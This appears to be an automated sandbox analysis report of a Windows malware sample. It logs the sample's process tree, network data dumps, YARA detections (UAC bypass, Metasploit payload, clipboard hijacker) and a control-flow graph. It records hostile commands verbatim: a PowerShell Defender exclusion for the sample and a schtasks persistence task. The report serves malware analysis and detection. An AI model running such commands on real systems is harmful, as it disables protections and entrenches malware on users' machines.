                                                                                                                                                                                                                              2024-09-24 13:35:14 UTC16384INData Raw: 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75
                                                                                                                                                                                                                              Data Ascii: supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu
                                                                                                                                                                                                                              2024-09-24 13:35:14 UTC3768INData Raw: 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61
                                                                                                                                                                                                                              Data Ascii: w more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div cla
                                                                                                                                                                                                                              2024-09-24 13:35:14 UTC2INData Raw: 6c 3e
                                                                                                                                                                                                                              Data Ascii: l>


                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                              Start time:09:34:16
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                              Imagebase:0x1dc89a70000
                                                                                                                                                                                                                              File size:5'022'848 bytes
                                                                                                                                                                                                                              MD5 hash:334014BA9B86B1E9C387A2FBD3B32053
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1511159649.000001DC8B8FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                              Start time:09:34:18
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
                                                                                                                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                              Start time:09:34:18
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                              Start time:09:34:18
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Windows Mail\wab.exe"
                                                                                                                                                                                                                              Imagebase:0xc0000
                                                                                                                                                                                                                              File size:516'608 bytes
                                                                                                                                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                              Start time:09:34:19
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Windows Mail\wab.exe"
                                                                                                                                                                                                                              Imagebase:
                                                                                                                                                                                                                              File size:516'608 bytes
                                                                                                                                                                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                              Start time:09:34:19
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7488 -s 900
                                                                                                                                                                                                                              Imagebase:0x7ff6fbef0000
                                                                                                                                                                                                                              File size:570'736 bytes
                                                                                                                                                                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                              Start time:09:34:22
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                              Imagebase:0x7ff605670000
                                                                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                              Start time:09:34:54
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              Imagebase:0x7ff6aae20000
                                                                                                                                                                                                                              File size:27'424'048 bytes
                                                                                                                                                                                                                              MD5 hash:8A35BE4E0576E642603DC78F07F32A93
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                              Start time:09:34:54
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exe
                                                                                                                                                                                                                              Imagebase:0xfb0000
                                                                                                                                                                                                                              File size:33'225'728 bytes
                                                                                                                                                                                                                              MD5 hash:B8A15F36239AC6A968A373BF93D06CE6
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 0000000E.00000002.1975978502.0000000003812000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                              Start time:09:34:54
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exe
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:6'655'499 bytes
                                                                                                                                                                                                                              MD5 hash:950CFC590026C689357A2DB4C9DE3FA6
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 0000000F.00000003.2589222539.000000000408A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                              Start time:09:35:04
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                                              Imagebase:0x2f0000
                                                                                                                                                                                                                              File size:231'736 bytes
                                                                                                                                                                                                                              MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                              Start time:09:35:05
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              Imagebase:0x7ff6aae20000
                                                                                                                                                                                                                              File size:27'424'048 bytes
                                                                                                                                                                                                                              MD5 hash:8A35BE4E0576E642603DC78F07F32A93
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                              Start time:09:35:19
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe"
                                                                                                                                                                                                                              Imagebase:0x7ff6aae20000
                                                                                                                                                                                                                              File size:27'424'048 bytes
                                                                                                                                                                                                                              MD5 hash:8A35BE4E0576E642603DC78F07F32A93
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                              Start time:09:35:27
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe"
                                                                                                                                                                                                                              Imagebase:0x7ff6aae20000
                                                                                                                                                                                                                              File size:27'424'048 bytes
                                                                                                                                                                                                                              MD5 hash:8A35BE4E0576E642603DC78F07F32A93
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                              Start time:09:35:32
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe"
                                                                                                                                                                                                                              Imagebase:0x7ff6aae20000
                                                                                                                                                                                                                              File size:27'424'048 bytes
                                                                                                                                                                                                                              MD5 hash:8A35BE4E0576E642603DC78F07F32A93
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                              Start time:09:35:46
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe"
                                                                                                                                                                                                                              Imagebase:0x7ff6aae20000
                                                                                                                                                                                                                              File size:27'424'048 bytes
                                                                                                                                                                                                                              MD5 hash:8A35BE4E0576E642603DC78F07F32A93
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                              Start time:09:36:16
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\service123.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\service123.exe"
                                                                                                                                                                                                                              Imagebase:0x810000
                                                                                                                                                                                                                              File size:314'613'760 bytes
                                                                                                                                                                                                                              MD5 hash:6661EFE43707F9C14239C4E43959C8F4
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                              Start time:09:36:16
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                                                                                                                                                                                                                              Imagebase:0x8b0000
                                                                                                                                                                                                                              File size:187'904 bytes
                                                                                                                                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                              Start time:09:36:16
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                              Start time:09:36:18
                                                                                                                                                                                                                              Start date:24/09/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\service123.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                              Imagebase:0x810000
                                                                                                                                                                                                                              File size:314'613'760 bytes
                                                                                                                                                                                                                              MD5 hash:6661EFE43707F9C14239C4E43959C8F4
                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:10.8%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                execution_graph 15459 7ffb4af231b9 15460 7ffb4af231c5 VirtualProtect 15459->15460 15462 7ffb4af23271 15460->15462

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 0 7ffb4af2ea09-7ffb4af2ea7e 5 7ffb4af2eaef-7ffb4af2eb05 call 7ffb4af2af60 0->5 6 7ffb4af2ea80-7ffb4af2ea85 0->6 17 7ffb4af2eb1f-7ffb4af2eb2a 5->17 18 7ffb4af2eb07-7ffb4af2eb1a 5->18 8 7ffb4af2eb06-7ffb4af2eb1a 6->8 9 7ffb4af2ea87-7ffb4af2eaa1 call 7ffb4af277c0 6->9 10 7ffb4af2ebb8-7ffb4af2ebba 8->10 14 7ffb4af2ec2b-7ffb4af2ec2e 10->14 15 7ffb4af2ebbc-7ffb4af2ebc1 10->15 19 7ffb4af2ec42 15->19 20 7ffb4af2ebc3-7ffb4af2ebdf 15->20 23 7ffb4af2eb2c-7ffb4af2eb3f 17->23 24 7ffb4af2eb41-7ffb4af2eb4c 17->24 18->10 21 7ffb4af2ec44-7ffb4af2ec45 19->21 22 7ffb4af2ec48-7ffb4af2ec96 call 7ffb4af2af60 * 2 call 7ffb4af27420 19->22 21->22 39 7ffb4af2ec9c-7ffb4af2ecba 22->39 40 7ffb4af2ee19-7ffb4af2ee73 22->40 23->10 26 7ffb4af2eb4e-7ffb4af2eb60 24->26 27 7ffb4af2eb62-7ffb4af2eb81 24->27 26->10 27->10 32 7ffb4af2eb83-7ffb4af2ebb4 27->32 32->10 39->40 41 7ffb4af2ecc0-7ffb4af2ecdf 39->41 52 7ffb4af2efa6-7ffb4af2f003 40->52 53 7ffb4af2ee79-7ffb4af2eed4 call 7ffb4af2af60 * 2 call 7ffb4af27420 40->53 45 7ffb4af2ece1-7ffb4af2ed00 41->45 46 7ffb4af2ed60-7ffb4af2ed6a 41->46 48 7ffb4af2ed71-7ffb4af2ed86 45->48 49 7ffb4af2ed02-7ffb4af2ed07 45->49 50 7ffb4af2ed9e-7ffb4af2edef call 7ffb4af2b930 46->50 51 7ffb4af2ed6c-7ffb4af2ed6f 46->51 55 7ffb4af2ed88-7ffb4af2ed99 48->55 54 7ffb4af2ed09-7ffb4af2ed58 call 7ffb4af277c0 49->54 49->55 50->40 64 7ffb4af2edf1-7ffb4af2ee18 50->64 51->50 68 7ffb4af2f0be-7ffb4af2f0c9 52->68 69 7ffb4af2f009-7ffb4af2f05e call 7ffb4af2af60 * 2 call 7ffb4af27420 52->69 53->52 79 7ffb4af2eeda-7ffb4af2ef30 53->79 54->48 67 7ffb4af2ed5a-7ffb4af2ed5f 54->67 55->50 59 7ffb4af2ed9b-7ffb4af2ed9c 55->59 59->50 67->46 76 7ffb4af2f0ce-7ffb4af2f0ea 68->76 77 7ffb4af2f0cb-7ffb4af2f0cd 68->77 69->68 93 7ffb4af2f060-7ffb4af2f084 69->93 83 7ffb4af2f0ec-7ffb4af2f117 76->83 84 7ffb4af2f134-7ffb4af2f176 call 7ffb4af2af60 * 2 call 7ffb4af27420 76->84 77->76 79->52 82 7ffb4af2ef32-7ffb4af2ef7d call 7ffb4af2b930 79->82 82->52 94 7ffb4af2ef7f-7ffb4af2efa5 82->94 87 7ffb4af2f11d-7ffb4af2f133 83->87 88 7ffb4af2f2ab-7ffb4af2f2da 83->88 84->88 110 7ffb4af2f17c-7ffb4af2f19a 84->110 87->84 102 7ffb4af2f2dc-7ffb4af2f307 88->102 103 7ffb4af2f324-7ffb4af2f363 call 7ffb4af2af60 * 2 call 7ffb4af27420 88->103 97 7ffb4af2f0b2-7ffb4af2f0bd 93->97 98 7ffb4af2f086-7ffb4af2f096 93->98 98->68 101 7ffb4af2f098-7ffb4af2f0af 98->101 101->97 105 7ffb4af2f30d-7ffb4af2f323 102->105 106 7ffb4af2f467-7ffb4af2f499 102->106 103->106 136 7ffb4af2f369-7ffb4af2f384 103->136 105->103 126 7ffb4af2f49b-7ffb4af2f4c6 106->126 127 7ffb4af2f4e3-7ffb4af2f4fb call 7ffb4af2af60 106->127 110->88 112 7ffb4af2f1a0-7ffb4af2f1ba 110->112 116 7ffb4af2f1bc-7ffb4af2f1bf 112->116 117 7ffb4af2f213-7ffb4af2f217 112->117 118 7ffb4af2f1c1-7ffb4af2f1da 116->118 119 7ffb4af2f240-7ffb4af2f27f call 7ffb4af2b930 116->119 121 7ffb4af2f219-7ffb4af2f23f call 7ffb4af277c0 117->121 122 7ffb4af2f298-7ffb4af2f2aa 117->122 124 7ffb4af2f1dc-7ffb4af2f1f1 118->124 125 7ffb4af2f1f3-7ffb4af2f204 118->125 137 7ffb4af2f281 119->137 121->119 130 7ffb4af2f208-7ffb4af2f210 124->130 125->130 131 7ffb4af2f4cc-7ffb4af2f4df 126->131 132 7ffb4af2f595-7ffb4af2f5a7 126->132 127->132 130->137 138 7ffb4af2f212 130->138 131->127 152 7ffb4af2f5e9-7ffb4af2f5f7 132->152 153 7ffb4af2f5a9-7ffb4af2f5ca 132->153 141 7ffb4af2f3dd-7ffb4af2f3e4 136->141 142 7ffb4af2f386-7ffb4af2f389 136->142 137->88 149 7ffb4af2f283-7ffb4af2f296 137->149 138->117 141->106 145 7ffb4af2f3ea-7ffb4af2f407 141->145 143 7ffb4af2f38b-7ffb4af2f3a9 142->143 144 7ffb4af2f40a-7ffb4af2f419 142->144 150 7ffb4af2f3ab-7ffb4af2f3b0 143->150 151 7ffb4af2f41a-7ffb4af2f42e call 7ffb4af2b930 143->151 144->151 145->144 149->122 154 7ffb4af2f431-7ffb4af2f43d 150->154 155 7ffb4af2f3b2-7ffb4af2f3d6 call 7ffb4af277c0 150->155 151->154 158 7ffb4af2f5fd-7ffb4af2f611 152->158 159 7ffb4af2f753-7ffb4af2f769 152->159 160 7ffb4af2f614-7ffb4af2f64f call 7ffb4af2af60 * 2 call 7ffb4af2cbe0 153->160 164 7ffb4af2f5cc-7ffb4af2f5e6 153->164 154->106 163 7ffb4af2f43f-7ffb4af2f466 154->163 155->141 158->160 169 7ffb4af2f76b-7ffb4af2f780 159->169 170 7ffb4af2f76a 159->170 181 7ffb4af2f651-7ffb4af2f667 160->181 182 7ffb4af2f669-7ffb4af2f674 160->182 164->152 174 7ffb4af2f781-7ffb4af2f7b9 169->174 170->169 176 7ffb4af2f7bb-7ffb4af2f7cd call 7ffb4af20238 174->176 177 7ffb4af2f7cf 174->177 178 7ffb4af2f7d4-7ffb4af2f7d6 176->178 177->178 184 7ffb4af2f7ea-7ffb4af2f861 178->184 185 7ffb4af2f7d8-7ffb4af2f7e3 178->185 181->182 190 7ffb4af2f686 182->190 191 7ffb4af2f676-7ffb4af2f684 182->191 209 7ffb4af2f867-7ffb4af2f8df 184->209 210 7ffb4af2f948-7ffb4af2f94f 184->210 185->184 193 7ffb4af2f688-7ffb4af2f68d 190->193 191->193 194 7ffb4af2f68f-7ffb4af2f6ae call 7ffb4af23428 193->194 195 7ffb4af2f6b0-7ffb4af2f6c6 193->195 200 7ffb4af2f6f3-7ffb4af2f6f9 194->200 201 7ffb4af2f6da-7ffb4af2f6ef call 7ffb4af2d5d0 195->201 202 7ffb4af2f6c8-7ffb4af2f6d3 195->202 200->170 205 7ffb4af2f6fb-7ffb4af2f700 200->205 201->200 202->201 205->174 208 7ffb4af2f702-7ffb4af2f730 call 7ffb4af277c0 call 7ffb4af27420 205->208 208->159 222 7ffb4af2f732-7ffb4af2f752 208->222 227 7ffb4af2f8e1-7ffb4af2f8e7 call 7ffb4af28a18 209->227 228 7ffb4af2f93f-7ffb4af2f947 call 7ffb4af2f994 209->228 212 7ffb4af2f96c-7ffb4af2f97c 210->212 213 7ffb4af2f951-7ffb4af2f95e 210->213 220 7ffb4af2f982-7ffb4af2f993 212->220 213->212 219 7ffb4af2f960-7ffb4af2f96a 213->219 219->212 232 7ffb4af2f8ec-7ffb4af2f93e 227->232 228->210 232->228
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525129112.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4af20000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: FL_H$RL_H
                                                                                                                                                                                                                                • API String ID: 0-1791236782
